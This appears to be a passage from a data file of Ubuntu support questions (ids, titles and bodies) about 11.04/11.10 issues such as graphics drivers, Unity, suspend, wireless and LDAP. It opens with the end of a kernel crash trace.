1220.544009 ] [ < ffffffff8116554b > ] ? __dentry_open+0x2bb/0x320 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff811d9b20 > ] ? bin_vma_open+0x70/0x70 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff815e9efe > ] ? _raw_spin_lock+0xe/0x20 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff811849ee > ] ? vfsmount_lock_local_unlock+0x1e/0x30 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff8104303b > ] ? efi_call5+0x4b/0x80 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff81042a7f > ] ? virt_efi_set_variable+0x2f/0x40 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff814bb125 > ] ? efivar_create+0x1e5/0x280 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff811d9d63 > ] ? write+0x93/0x190 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff811d9de4 > ] ? write+0x114/0x190 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff81167813 > ] ? vfs_write+0xb3/0x180 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff81167b3a > ] ? sys_write+0x4a/0x90 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] [ < ffffffff815f22c2 > ] ? system_call_fastpath+0x16/0x1b $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] code : ec 01 75 f0 41 bc 01 00 00 00 e8 e5 fb ff ff e8 e4 fc ff ff 33 c0 44 0f b7 c0 66 3b c3 73 20 41 0f b7 c0 41 0f b7 d0 03 c5 8b c8 < 8a > 00 42 38 04 3a 75 0a 66 45 03 c4 66 44 3b c3 72 e2 33 c0 66 $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rip [ < ffff880066d44c1f > ] 0xffff880066d44c1e $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] rsp < ffff88005e2cbab0 > $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] cr2 : 00000000ffe1867c $ oct 21 01:05:17 ubuntu kernel : [ 1220.544009 ] -- - [ end trace 493844b002da4787 ] -- -
70031	how to use 3d graphics on asus eee pc 1215n	i need opengl for some programs , but opengl is not being used although installed , as is the nvidia driver . as i understand it , the asus eee pc 1215n has an nvidia ion2 gpu and an intel graphics unit . on ubuntu 11.04 , the current nvidia driver is installed , but not used . when i run nvidia-xconfig it creates an xorg.conf file , but x does not start with that . how do i get opengl support running ? is there a way to use the intel card , or does only the nvidia support 3d ? if only the nvidia ion2 supports 3d , how do i get a working xorg.conf for the nvidia gpu ? update ( 2nd january 2012 ) : i have now found that installing ironhide works for me on the asus eee pc 1215n . there are several questions where ironhide , and its predecessor bumblebee , are discussed , but most were outdated . the linux hybrid graphics project has been moving very fast , changing names , features , web addresses and setup . it took me a few hours to figure out what was what . anyway , the good news is , you can install ironhide with the ubuntu software center . ironhide provides a gui in which you can choose a profile for your device . i had to reboot before everything worked properly . you can also switch between nvidia and intel gpu with a console script provided by ironhide . once setup correctly , graphics acceleration works and battery duration increases significantly , e.g . over 5:00 hrs , instead of 3:40 hrs , with wifi on !
70037	how can i install ‘theme selector’ gnome shell extension ?	i have seen tutorials around the web to do it with 11.04 if you downloaded gnome shell from the ppa , but i ca n't compile it because it gives me errors . i ca n't use a deb package that is available for users like me that ca n't compile from git . i 'm guessing it is because i 've installed gnome shell from the ubuntu software center after installing 11.10 .
70041	how to hide status message in pidgin ?	how can i hide all status message in pidgin ? for all kinds of accounts , jabber , msn etc . @ update : i actually mean the short line of message displayed right after the nick name of contacts , was n't that called status message ? please correct me .
70043	ca n't start without x server in order to install video drivers	on 10.10 i was able to make quick video drivers installs just by starting ubuntu in `` recovery mode '' , which would me allow to modify the x server . but now if i start the system in recovery mode it still starts the x server and all the service gdm stop and service lightdm stop commands wo n't work . gdm says it is n't a recognized command and lightdm simply turns off my screen . none of the ctrl+alt+f* combinations work . this is getting to my nerves . please ! i just upgraded my system and i need to install the video drivers . thank you !
70044	loading screen wrong resolution	i 've got a problem when booting : i see the grub screen where i can choose what exactly to boot into - after hitting enter my screen simply shows me that purplish background and after some seconds it shows me the ubuntu logo with the logo dots in a pretty low resolution ( my guess would be 640x480 ) ; it then loads quickly and takes me to the login screen . so it 's working , just not quite right i guess . my computer is a lenovo thinkpad x121e , with a amd e350 cpu and an ati mobility radeon hd 6310 graphics card ( fully detected and working with the vesa : wrestler drivers ) .
70046	how to open the synaptic package manager in unity ?	i just installed a fresh copy of ubuntu 11.10 . how to open the synaptic package manager ?
70052	ca n't login into ubuntu	i started having this issue after having removed kubuntu from my computer . at first login screen would n't even show , instead the screen stopped at checking battery state stage . at this point i still could use startx after alt+f1 . then i reinstalled and reconfigured dmg and ubuntu-desktop a number of times , so i got my login screen back . now , everytime i get to the login screen , my user name shows up but password is not requested , just an 'access ' button shows , and if i click the button the screen just goes black for a second and then i 'm back to the login screen . i can get into ubuntu only via guest account . in addition , alt+f1 and startx does n't work anymore , giving me an output that ends like this : xinit : unable to connect to x server : connection refused xinit : server error since i believe this is somehow related to an x issue , i took a log of xorg.0.log , here is the link . hope someone has a solution .
70071	wrong window focus behaviour in unity , but not gnome shell	i just upgraded from 11.04 to 11.10 , and i 'm noticing a strange window behaviour that i ca n't seem to fix . basically it seems like all windows have focus , as shown in this screenshot : it happens almost all the time , but sometimes windows appear as out of focus , and when they are clicked , they stay like that . i tried using gnome shell and the problem does n't exist , so it seems it has something to do with unity . let me know if you need any more info to help me solve this problem . thanks !
70072	can i put the ubuntu button on the top panel instead of the launcher ?	i 'm a long *nix user , anda just upgraded to oneiric and found this huge button in the dash . i use a netbook and i do n't have much vertical space , for me the other position was way better . so , i was wondering , how can i revert the dash button to the top bar ?
70074	ubuntu 11.10 slow on acer aspire 5253	my acer aspire 5253 is running slower than 11.04 , after i activate ati 's propietary drivers , 多any idea ?
70076	where 's admin tools gone in 11.10 ?	in 11.10 , with unity , i do not see all the admin tools . especially , i want to access `` users and groups '' tool . where is it ? should i install it ? how can i access all the admin tools that were with the previous ubuntu versions , in general ?
70079	with ubuntu 11.04 and 11.10 , why do i have to run commands to enable two finger scrolling ?	when i run the following commands in the terminal the radio button in the mouse options will enable two finger scrolling . if i do not run these commands first , then scrolling radio button no longer does anything and i lose scrolling completely if i tick the radio button . what would be the best solution ? xinput set-int-prop `` synps/2 synaptics touchpad '' `` two-finger scrolling '' 8 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 8 1 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 32 10 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger width '' 32 8
70080	compiz rotate cube - glitchy windows ?	i 've gotten the desktop cube and rotate cube effects to work . ( and it works perfectly when i use the mouse ) . unfortunately , it 's a little messed up when i use the keyboard ( left/right ) . it switches fine , but when it gets to the new face of the cube then the windows of the cube i just left flash onto the screen for a second . ( example : i currently have a chromium window opened . when i press right then the cube rotates as it should . when it gets to the new side the chromium window 'flashes ' for a moment -- even though it 's on the other side of the cube . ) also , ( and this is mostly what i want to fix ) , when i use right/left ( it should 'rotate right/left with window ' ) the awesome animation of the window 'bending ' around the cube occurs , but when it gets to the new side it 'flashes ' and does n't come back . it 's still on the original cube face . sorry for my lengthy description ... any ideas ? edit : forgot to say : i did this on my laptop running ubuntu 11.10 . thought it might have been just a laptop thing , but i installed ubuntu 11.10 on my desktop today and it did the same thing .
70091	my only account is not in the sudo group	i installed ubuntu 11.10 with a username fooname . and then i did something like sudo usermod -g vboxsf fooname then , guess what : no one is a sudoer . how can fooname be back as a sudoer ? in addition , what should i have executed to add fooname to the group vboxsf ?
70095	how do i configure a cable net ?	i have installed ubuntu 11.10 at home , i have cable net internet connection . in windows i am able to connect by dial-up connection . how do i configure it in ubuntu 11.10 ? log file attached below i am trying from 5 days please help me sorry i have to post this from windows xp .
70100	how to change the workspace navigation keyboard shortcuts ?	i wanted to change my workspace navigation . move to workspace left - > alt+a move to workspace right - > alt+d move to workspace above - > alt+w move to workspace below - > alt+s everything was fine except for alt+a because when i press alt+a i get to access the all settings above . it changes the page to all settings .
70101	garbage black text on white screen on a server	i installed ubuntu server on a computer and it seems to work fine , i can ssh into it and everything but i ca n't understand anything that appears on the screen . it has a white background and instead of normal characters it just shows garbage text . this is a picture of the screen this is a video of the computer starting if that helps http : //www.youtube.com/watch ? v=kw3vkipqcxw does anybody know why this is happening ?
70106	after i put my computer on sleep , when i turn it back on , my screen freeze like this . why ?	i use ubuntu 11.10 . my display freeze when i put my computer on sleep . so on wake-up , i 'm forced to restart it . i tried with 2 differents screen and same result . why ? ps : i would upload a screen-shot but my reputation points is not high enough .
70108	dual view monitors for one desktop on ati	how do i get dual view ( two monitors with full-hd-resolution ) for one desktop on unity with an ati card on ubuntu 11.10 ? on 11.04 all worked fine . now i have the problem , that after customizing on `` amd catalyst control center ( administrative ) '' nothing happens . and if i open it again , the standard configuration is shown again . on ubuntu system settings i also get a problem . there is a message that the virtual resolution is too high ( the maximum for both monitors seems to be 1920*1080 ) . i have two monitors with the following resolution : 1920*1080 . so there must be a way to get the virtual resolution for 3840*1080 . again : this worked for me on 11.04 . and i customized it with `` amd catalyst control center '' .
70112	why does $ service -- status-all output to stderr instead of stdin ?	this is very unintuitive . e.g . when a user tries to : # service -- status-all | grep postgres this wo n't work ... the only way to grep `service ' is : # service -- status-all 2 > & 1 | grep postgres on gentoo linux for example this problem does not occur : # rc-status | grep postgres will work fine .
70115	separate touchpad sensitivity	for gaming precision on pc , i have disabled mouse acceleration . the mouse speed works as i wanted to , however the touchpad is just too slow . is there a way to have separate cursor speed for mouse and trackpad ? i prefer no acceleration at all
70123	simple nas setup for ubuntu	so , i want to connect my shiny new nas ( qnap ts-210p ii ) to my ubuntu 11.10 box . i have a 2nd ubuntu machine , but i do n't use that enough to be too worried about it . use is ideally to offload all storage except for system ( which can then run off a 30gb flash drive ) . the main machine also runs myth front/backends . both are on a wired network currently . i have got a basic setup working , mounted over nfs , but have some issues , and whenever i look for answers , i seem to get unto the ubuntuserver domain , with what seems like more detail than i want in an answer . questions i have identified so far : 1 ) sharing uids to get file permissions correct . ldap or something else ? what is necessary to make this work ? 2 ) mounting an nfs device reliably . do i just add it in fstab or is some sort of auto-mount advisable ? its a wired network , but i should n't need to worry about reboot after power-outages and sequencing ...
70124	how to prevent screensaver from locking the screen in unity	just upgraded to 11.10 and there is one pretty annoying thing : whenever unity decides that my laptop was idle for too long , the screen goes black and -- the most annoying part -- locks up . thus , two questions : how do i configure this `` idle '' period and how do i prevent the screen from locking up in this case ? thank you .
70126	file : // protocol connected with wrong program	i have the problem that when i open some programs/documents in gnome , the wrong application is launched to open these . i think i already narrowed the problem , that everything that is called with file : // will be launched with the wrong program ( in my case keepassx ) . i remember that when everything starts , i wanted to start keepassx from my gnome-panel . ubuntu asked me with what program it should be started . i wondered a little , since i used it already a lot , so i choosed keepassx from the list . but it seems that this has overriden the file-protocol handler . some situations where the wrong program is called : shortcuts in my gnome panel ( personal folder - which should open nautilus , keepassx , some txt files ) , synapse ( launcher like gnome-do ) and firefox finished downloads . how can i reset this setting to get everything back to normal ? edit : the only reliable way to open files currently is via nautilus . to give an example , a shortcut in the gnome-panel has the following properties : name : myfile.txt , location : file : ///home/dag/myfile.txt , comment : »/home/dag/myfile.txt« öffnen i use ubuntu 11.04 with `` gnome-classic '' aka gnome2 2.32.1
70127	is it possible to create nested quicklists ?	is it possible to create nested quicklists for the unity launcher - possibly - is this a future planned capability ?
70129	how can i stop nautilus from scrolling the window when i move a file out of a directory ?	say i have a folder that has a lot of directories , and a lot of files in it . i click the arrow to expand the folder and then drag the folder down to the file list in the parent directory . when i release it , nautilus moves the window so that the file you moved is still in the visible plane . this causes me to lose track of what directory i was in . is there some way to disable this , or to hold down a key while i 'm moving the file so the file is n't followed ? it seems like an ideal behavior to be able to control .
70137	invisible text in software center	after upgrading to oneiric i hade some graphical issues , but now that i got them resolved , i encountered another issue . the start page for software center shows no text at all , though the single application pages works perfectly . i can see the top 2-4 pixels of the text when hovering . i 'm running 64bit ubuntu 11.10 with hybrid graphics ( intel hd 3000 and amd radeon hd 6630m ) . currently only the intel card seems to work so the driver should be from xorg , xserver-xorg-video-intel ? is this a problem with my graphics or is software center ( or some corrupted dependencies ) causing this ? what can i do to make it work properly ?
70138	ubuntu one windows uninstall.exe file missing	i want to uninstall ubuntu one but unistall.exe file is missing in folder . now i try to reinstall from installer to get uninstall.exe file , but same problem : the installer do not install unistall.exe file , but create a shortcut for uninstalling . shortcut do not work because main unistall.exe file is still missing .
70140	closing lid does not suspend laptop	i 'm on a lenovo t400 laptop . in the past i had suspend problems on every second version of ubuntu ( at least it feels like it ) , but in 11.04 it was working perfectly . now , after the upgrade to 11.10 closing the laptop lid does no longer initialize suspension . when i choose 'suspend ' from the shutdown menu it works perfectly , so this does not seem to be an issue with suspend itself . the options in system settings > power are of course set to suspend in case of closing the lid ( both for battery and ac poer ) . note : i have no idea if this is of any importance , but i 'm running the gnome-session-fallback stuff , as i just hate the unity desgin .
70146	i have two monitors on my computer , how can i set a different wallpaper to each	i have two monitors on my computer , how can i set a different wallpaper to each . i do n't use workspaces , two screens are enough . i know it 's possible to set a different wallpaper to each workspace but i ca n't find anything on individual screens . it is a laptop , but i have two graphic cards running sli mode so both monitors are running off of the first .
70147	raleigh theme on lightdm , ubuntu desktop , nautilus window , menus & menu-bars	after performing an upgrade from natty to oneiric , i had a problem similar to the one reported in here at every system boot : desktop forgets theme ? everything , from the ligthdm greeter to the ubuntu desktop used the ugly raleigh theme , apart from firefox , thunderbird few other applications after logging in . unfortunately none of the solutions suggested in the topic above worked for me . the only way i could get acceptable appearance would be to switch to gnome at login and using the adwaita theme . the lightdm greeter still uses the raleigh theme though . unfortunately , i tried some `` brute-force '' methods by reinstalling ( sudo apt-get install -- reinstall ) ubuntu-desktop , unity , unity-common , unity-greeter , gnome-session , gtk2-engines . i also tried moving .config , .gconf , .gconfd , .gnome , .gnome2 to a backup dir to reset account desktop preferences . none of the above solved the issue . on the contrary , logging-in to ubuntu setup does not show unity and window decorations anymore . my fallback remains the gnome logon and the adwaita theme . this is my workstation machine i am hosting ubuntu on , so , though possible , it is time consuming to perform a backup and format-reinstall ubuntu 11.10 . could you please let me know if i can get an alternative way of repairing my ubuntu desktop ? ( i believe it all started when , during the 11.04-to-11.10 upgrade , the installation of downloaded packages for oneiric broke when nautilus-dropbox failed to access the dropbox servers - i am behind a proxy but with proper proxy settings had no problems using apt-get & synaptic . however i removed dropbox and resumed partial installation on second boot . )
70149	terminal output missing	the terminal output often goes missing - the space is there where lines should be but only black background shows . usually seems to be the first 3-4 lines at the top of the terminal screen , but is n't consistent . hitting ctrl-l to refresh the output , sometimes fixes , but often the refresh just misses other lines . moving the window reliably redraws it . the problem occurs with both xterm and rxvt , so suggests it 's a painting issue rather than the terminal itself . running ubuntu 11.10 , but i recall problem appeared ( albeit much less often ) with 11.04 . x is using the radeon driver with an his ati radeon hd 5550 pci express card . thanks in advance
70150	restoring old workspace switcher	previously ( 11.04 ) when i ctrl+alt+arrow keyed i 'd get a 2x2 grid of workspaces to switch to which i could do really easily . since i updated however this has become one single row . i 've tried installing workspace indicator and others but no matter how many rows i set , i always just get one . any ideas ?
70154	epson stylus dx4250 usb scanner not working anymore	i had been successfuly using the scanner of my epson stylus dx4250 on ubuntu ( 32bit ) since i 've bought it years ago . now i 've updated to 11.10 64bit and it is not working anymore . have heard of some issues regarding usb , and some others regarding hal , but i 'm not sure where to start looking . here is what dmesg shows : [ 53778.567908 ] usb 2-1.2.4 : new high speed usb device number 10 using ehci_hcd [ 53779.874059 ] usb 2-1.2.4 : usbfs : process 25525 ( usb ) did not claim interface 0 before use doing a reboot , this is what i get : [ 72.024538 ] usb 2-1.4 : new high speed usb device number 6 using ehci_hcd [ 73.266142 ] show_signal_msg : 30 callbacks suppressed [ 73.266145 ] simple-scan [ 1972 ] : segfault at 9691a85 ip 00007f146f3131a4 sp 00007f145fffbe00 error 4 in libc-2.13.so [ 7f146f2ca000+195000 ] [ 73.322406 ] usb 2-1.4 : usbfs : process 2027 ( usb ) did not claim interface 0 before use [ 146.794098 ] usb 2-1.4 : usb disconnect , device number 6 any idea ? edit : the output of lsusb is : ... bus 002 device 010 : id 04b8:0820 seiko epson corp. cx4200 mp scanner
70156	hp dv7 beats audio alsa.base modification . what should be the line ?	my laptop has 2 front speakers + 2 next to screen + 1 subwoofer . if i do n't edit alsa.base i get 2 speakers under lcd . if i put this in alsa.base , i get : $ options snd-hda-intel model=ref i do get sound from 2 front speakers + subwoofer , but do n't get the sound from speakers under lcd . if i put : $ options snd-hda-intel model=hp i get 2 + 2 speakers `` muffled '' but not the subwoofer . anyone could help ?
70158	is ubuntu 11.04 slower ?	recently , i did the upgrade for ubuntu 11.04 and i have a much longer startup , as well as time to launch some programs . can this problem be solved ?
70166	how to only place/size *first* matching window ?	using 11.04 with the unity interface and compiz 3d , via the compizconfig settings manager ( ccsm , not installed by default but very useful ) i can use the `` place windows '' plug-in to set the default placement of a window , and the `` window rules '' plug-in to set the default size of a window , which is very handy . ( be nice if i did n't have to duplicate the rules , but hey , *nix is all about small pieces working together ... ) is there any way i can set up those rules so that they only apply if the window being opened is the only match for them ? e.g. , not to the second or third matching window that i open ? ( example : the first time i open chrome , i want it at x , y with size w , h , but if i hit ctrl+n , i want that second window placed according to the general rules , not my fixed rule . ) or would i have to fall back to wmctrl and/or devil 's pie scripts for that sort of thing ?
70167	google-earth font issue on installation	i 've tried installing google earth on oneric ( 11.10 ) following instructions here : to do list after installing ubuntu 11.10 ( scroll way down or search the page for `` google earth '' ) however with either method i end up with a very strange looking ge . i assume it is related to fonts , but i did install the mscorefonts as required by the created package . does anyone have suggestions ?
70169	how to disable the guest account at the login of ubuntu 11.10	whenever i boot up i get this guest account which i dont like can someone help me to remove this account .
70171	make kdm the default display manager	i 'm giving kde another try - so far so good . i installed everything using apt-get install kubuntu-desktop . during the installation it asked me which login manager to use and i chose lightdm - however , now i 'm finding user sessions ( kde ) are behaving a little funny - when left for some time , they lock out asking for password , but there 's no way to switch user ( i.e . there 's a small window asking for password with ok and cancel buttons - no switch user , shutdown , suspend or anything ) . pressing ctrl-alt-f [ something ] shows a text log , where i can see a message `` not starting kdm because it 's not the default manager '' - so i think my problem can be fixed by making it default . how can i do this ? ( actually , trying to switch user via k-menu - leave - switch user results in the same dialog : `` the session was locked by sergey , please enter your password '' )
70177	unity , vmware workstation and the super ( windows ) key	i frequently run windows 7 and mac os x as guest os in vmware workstation on ubuntu 11.10 . whenever i hit the super ( windows ) key in windows/mac os the unity launcher is activated . even if i 'm running vmware fullscreen . this is really annoying . is there any way to tell compiz/unity/etc to ignore the super key while vmware is focused ? i know i could change unity to use another key but i 'd like to be able to use the super key if possible when i 'm not working in vmware .
70182	how do i install launchpad stable version ?	i was trying to install launchpad by using rocketfuel-setup , it is always installing the development version . how do i install launchpad stable version ? what is the recommended setup ( no of nodes , caching server etc ) ?
70184	windows 7 reboots after failed ubuntu installation ?	recently i tried to install ubuntu 11.10 on a windows 7 machine . the installation froze twice right after the initial purple ubuntu splash screen and after the progress bar stoped responding ( no cd or hdd activity for more than 20 minutes ) . both times when i tried to reboot my computer back to windows 7 the computer restarted by itself right after loging in to windows giving me a `` systemboot fail or post interrupted ... . '' message . after pressing f1 to coninue the machine booted just fine to windows . i didnt gine any attention to this problem since it only happened 2 times and right after the failed ubuntu install . after that i installed some other linux distro . so now every time i boot in linux and try to reboot to windows 7 i get an extra reboot at login . tried to repair windows startup but nothing happened . also tried to look for blue screens before the restart but none is recorded . any ideas ?
70188	how do i boot into console mode ?	in previous versions of ubuntu i could get the computer to boot into console mode by setting the variable grub_cmdline_linux_default to `` text '' in the file /etc/default/grub and run sudo update-grub . in ubuntu 11.10 , however , it has no effect - i am still presented with the lightdm login screen . any clues ?
70192	at last time skype isnt started ?	very much pleasant to me your production . but recently it is not started skype and after reinstallation ubuntu has changed nothing . i ask to help or prompt the decision sorry if the text is written incorrectly , im russian ) ubuntu 11.10 ukraine , kiev
70193	where is the source code to the `` ubuntu apps directory '' ?	i want to make an web based offline package installer that combine ubuntu apps directory , apt web , and some automated installer script does anyone know where can i find ubuntu apps directory source code ?
70199	does n't boot after fresh install	after fresh install of oneiric 11.10 nothing displayed during boot process , but i still can switch to tty 's . i made apt-get update/upgrade from tty and tried to reboot . nothing changed . 'service lightdm restart ' and 'startx ' also does n't help . upd ( 24.10.2011 ) : just reported bug with apport-bug to launchpad . you can see there logs and others collected reports .
70205	why does 11.10 wait for network config when everything is static ?	i 'm one of the many confused by the new several minute delay when booting an upgraded ubuntu 11.10 system . i have two nics , both with static ip addresses , plus lo and nothing else ( that i know of ) . so ( a ) what is the system waiting for ? and ( b ) why does it think it failed and warn that is it is going to proceed with `` broken '' network configuration ? this is extremely disconcerting even though every network thing i 've known to check appears to be working fine . fwiw , here 's my interfaces file ( actual addresses obscured ) : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth1 iface eth1 inet static address w.x.y.z netmask 255.255.255.248 gateway w.x.y.z # the extra network interface auto eth0 iface eth0 inet static address w.x.y.z netmask 255.255.255.0 gateway w.x.y.z oh , i 'm not running under vmware , this is a dedicated pc , but i 've followed the instructions about changing /var/run and /var/lock into symlinks anyway , but of course that did n't help .
70209	no folder - or files - icons	i am totally new to ubuntu and have recently installed ubuntu 11.10 ( 64 bit ) on my hp elitebook 8540w ( installed it alongside win7 on it 's own partition formatted in ext4 ) . for the first few days , everything seemed to work just fine , but now , all of a sudden , the icons for the folders and files just disappeared ( i would have liked to upload a screenshot to show it to you , but that is n't possible since i 'm a new user . ) instead of the regular icons for devices , files or folders , they all have the same icon now which is a white/grey piece of paper , so you ca n't really tell anymore whether a certain entry you 're looking at is a file or a folder . i do n't really know what other information might be useful concerning this issue , so i 'm just posting this question without further info . feel free to ask if you need to know more , though . anyway , thanks in advance !
70211	slow and unresponsive wireless on an atheros ar5212	i installed ubuntu 11.10 on my home desktop and am having problems with the wireless network . it actually makes the connection , but it is so slow and unresponsive it is unusable . my wireless network adapter is a d-link dwl-g520 rev . b with an atheros chipset , and this is the relevant output from running lspci . $ sudo lspci -vvv 04:02.0 ethernet controller : atheros communications inc. ar5212/ar5213 multiprotocol mac/baseband processor ( rev 01 ) subsystem : d-link system inc airplus dwl-g520 wireless pci adapter ( rev . b ) control : i/o- mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 168 ( 2500ns min , 7000ns max ) , cache line size : 64 bytes interrupt : pin a routed to irq 18 region 0 : memory at e3000000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath5k kernel modules : ath5k what other information could help finding the root issue ? what logs should i check ? edit : the network is working fine now . not sure what did the trick , if some fiddling with the router or upgrading network-manager
70223	no window snapping on fresh install	i recently downloaded 11.10 and demoed on the live cd . snapping worked great . after installing snapping no longer works . i tried recreating my home directory from /etc/skel as well as creating a new user to make sure it was n't a local problem . no luck . i also tried reinstalling which did n't help . nor did installing all compiz-plugins* and wmctrl packages and reloading compiz . edit - 1 : i installed compizconfig settings manager but nothing jumped out at me to change . what might have changed between the livecd and the installation ? edit - 2 : after continuing to look for a solution i 've realized my terms do n't mean what i meant them to . by snapping i mean the feature termed aerosnap in ms windows where dragging a window to the left/right/top of desktop will cause the window to be sized to fill the left half/right half/all of the screen . edit : this install is running on a dell e6420 with a nvidia corporation gf108 [ quadro nvs 4200m ] video card . i am selecting `` ubuntu '' on the login screen but end up with unity-2d-panel and unity-2d-launcher processes running upon login .
70224	how to do window placement without the numpad ?	i have a computer without a numberpad , i would love to be able to do the window placement thing ( example ctrl+alt+kp1 ) . is there a way i can reset the shortcuts for this ?
70225	is there a specific way to extend battery life in a toshiba netbook ?	i 'm using lubuntu 11.10 on a toshiba nb-500 . the new kernel 3.0 partially solved some issues related with overheating and absence/or/unstable wi-fi connection . but i see no improvements in power management when it comes to battery life : it only lasts for 3/4 hours on linux ( 7/8 hours on windows starter ) . when using windows , the toshiba software , mainly , the eco utility , are decisive to achieve those results . i wonder if anyone knows a specific trick to increase battery life on this netbook in linux . please note , i 'm not looking for general tips like 'powertop ' , 'cpu scalling ' , 'screen brightness ' , and so on . i 've tryed all that and it did n't work , so do n't mark this thread as a duplicate question . thank you !
70232	`` failed to download repository information '' error	i have recently installed ubuntu 11.10 . but when i try to install a software it tries to 'updating cache ' but after a while , it stops , showing : failed to download repository information check your internet connection so , now i am totally unable to install any software in my ubuntu . please , let me know how to solve the problem .
70236	how can i create an administrator user from the command line ?	i want to create a user with administrative privileges and all the regular setups like home directory . is there a adduser parameter to give the user sudo powers automatically ? what are the default settings for adduser ? will it automatically create home directories and all the other things without extra parameters ? ( i.e . is adduser < username > enough ? )
70237	skype screen sharing with gnome shell 3.2 problem ?	does anyone experience this problem : when sharing full screen on skype , using gnome shell , the panel disappears , all windows disappear and the other user do n't receive the screen either . sort of a freeze . i 'm on ubuntu 11.10 , oneiric ocelot . gnome shell . how can i fix the problem , and if it 's a bug . who should i report it to ? gnome or skype ? few notices : with google plus screen sharing , there is no problem at all . it works as expected . i did notice , the same thing happens , when i tried to use gtk record my desktop application . with ffmpeg instead the problem does not occur . using unity the problem does not exist . thanks . i'v reported a bug on launchpad . https : //bugs.launchpad.net/ubuntu/+source/skype/+bug/879895 if you are having this issue , please comment on the bug and click , the bug affects me impportant update : i figured that when unticking the option in gtk recordmydesktop of outlining the capture area , the panel does not disappear . and the problem is solved . the question is how do i disable the outlining of the capture area in skype while sharing desktop
70245	how do i make the system-wide proxy settings bypass the proxy for local addresses ?	i set global proxy settings via system settings > network > network proxy i set the socks host . all apps , including the command line apps successfully picked it up . but its a problem with mercurial , which has trouble finding a pc on the same network . how do i set the system proxy settings to exempt local addresses ?
70251	why wo n't my flat-screen tv work with ubuntu ?	why will the same graphics card that allowed me to use the flat screen tv when running windows not display with ubuntu ? keep it simple please . i am new to linux , still feeling my way around .
70256	server crash - how do i investigate the issue ?	what is the correct way to diagnose the problem ? or get to the bottom of the crash ? i 've ubuntu server . it crashed out of blue . i could n't connect to ssh it was refusing connection . and all services except apache were down . i tried to look at /var/log/ but could n't find anything useful .
70258	how can i get a temperature sensor on my gnome panel in ubuntu ?	i would like a gnome applet that shows the current temperature inside the laptop . currently i use gkrellm but it takes up too much space on my desktop . i tried installing 'sensors-applet ' but the applet did not appear in the list of things to add when i right click on the gnome panel and select 'add to panel ' . i am using ubuntu 11.04 .
70263	second monitor not coming back on after going into hibernate	10 and a new problem has come up . when i my machine hibernates the second monitor does not come back on . i did not have this problem in 11.04 . the main monitor is plugged into a vga port , and the second plugged into a display port then an adapter to vga the system is a dell optiplex 790 and the graphics card is ( according to lspci ) a vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) i am running the classic gnome desktop though the problem occurs in unity as well .
70271	tp-link tl-wn821n automatically disconnects	i have a problem with my usb wireless stick ( tp-link tl-wn821n ) when i 'm surfing on the net or something like that , so in every ~30 minutes i get disconnected from the internet , unfortunatly whent it happens i always have to unplug and then connect this usb device so that i can connect to the internet again . this is very frustrating : ( if you have any idea please help me ! thanks in advance ! attila ps : under windows it works properly and under the previous version of ubuntu
70272	change the list of applications to install in the livecd environment ?	change the min_disk_size answer to why does the lubuntu minimum install say that it requires 10.7 gb of available drive space ? describes : in livecd environment ... is it also possible to delete items from the application to be installed from the livecd environment ? how ?
70273	how do i use the ldap schemas in /etc/ldap/schemas provided by slapd	i 've installed slapd ( 2.4.21 ) on ubuntu 10.04 , which comes with a lot of .schema files in the /etc/ldap/schemas directory . some of these .schema files have associated .ldif files , so i 'm able to add them with the ldapadd command as described in the official docs , e.g . sudo ldapadd -y external -h ldapi : /// -f /etc/ldap/schema/cosine.ldif but there are a lot of other .schema files in that directory which do not have associated .ldif files . i 've got a project which uses the pwdsafemodify attribute , which is defined in /etc/ldap/schemas/ppolicy.schema which i need . under older versions of slapd , i 'd put the line include /etc/ldap/schema/ppolicy.schema in my config file , but i ca n't figure out how to include that in my coolproject.ldif file . i followed the instructions in the official docs to use slapcap to add dyngroup which contains all of the schemas in that file , but even after using ldapadd as instructed to add it to my ldap directory structure , but i still get an undefined_type error for the pwdsafemodify attribute . so how do i make a .ldif file for the ppolicy.schema file so that i can use the pwdsafemodify attribute in my project ?
70278	how to view all mounted devices and respective free space	i have ubuntu 11.10 and i do n't see my computer option in nautilus . i want this option so that i can view the disk statistics . is there any other way to list all mounted devices and their respective free spaces within nautilus ? because i find it very hard to go to properties every time or use a disk analyser which takes loads of time or a screenlet which takes up memory . is there any other simple solution ?
70280	why the last ubuntu updates ask to remove libcupsys ?	today i decided , f rom the update manager to bring the last updates in my oneiric but that 's the problem : probably , the upgrade of cups ask to me to delete libcupsys2 and my printer 's drivers . somebody knows a solution to resolve this problem ? thanks : - )
